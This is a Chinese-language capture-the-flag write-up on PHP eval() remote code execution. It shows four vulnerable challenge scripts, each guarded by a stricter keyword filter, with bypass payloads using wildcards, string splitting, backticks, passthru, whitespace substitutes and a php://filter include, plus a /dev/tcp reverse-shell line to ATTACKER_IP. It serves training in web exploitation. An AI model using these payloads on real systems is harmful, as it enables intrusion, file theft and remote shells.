RCE复现
1.过滤flag
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
代码审计过滤了"flag"关键词,但限制较弱,容易绕过
?c=system("ls"); // 列出目录
?c=system("cat fla*"); // 使用通配符绕过flag过滤
?c=system("cat fl"."ag.php");
?c=$a="fl";$b="ag";system("cat $a$b.php");
?c=system("cat `echo fl\"ag.php`"); // 使用反引号
?c=echo file_get_contents('fl'.'ag.php');
?c=highlight_file('fl'.'ag.php');
?c=exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'");
2.过滤flag/system/php
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
} 代码审计滤掉了flag、system与php。把system函数替换为其他具有类似功能的函数,php可以使用通配符
?c=echo `ls`;
?c=echo `cat fl*`;
payload:?c= echo `tac fl'ag'.p'hp'`;
使用内置函数
?c=print_r(scandir('.'));
?c=var_dump(file('fla*'));
?c=show_source('fla'.'g.php');
字符串拼接或者编码
?c=$a='fl';$b='ag';echo file_get_contents($a.$b.'.php');
?c=readfile('fl'.'ag.php');
?c=highlight_file('fl'.'ag.php');3.过滤flag/system/php|cat|sort|shell|\.|
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
代码审计.过滤flag/system/php|cat|sort|shell|\.|
绕过思路使用未过滤的命令执行函数;
?c=passthru($_GET[a]);&a=cat flag.php
?c=echo%09`tac%09f*`;
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));4.常见过滤
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
} 代码审计
代码过滤了flag, system, php, cat, sort, shell, echo
:., (空格), ', \``, ;, (, :, ", <, =, /`
0-9
绕过思路:过滤了空格可以用${IFS}和%0a 代替,分号可以用?>代替 但是过滤了括号之后就不能用带有括号的函数,php中include是可以不带括号的函数
?c=include%0a$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php 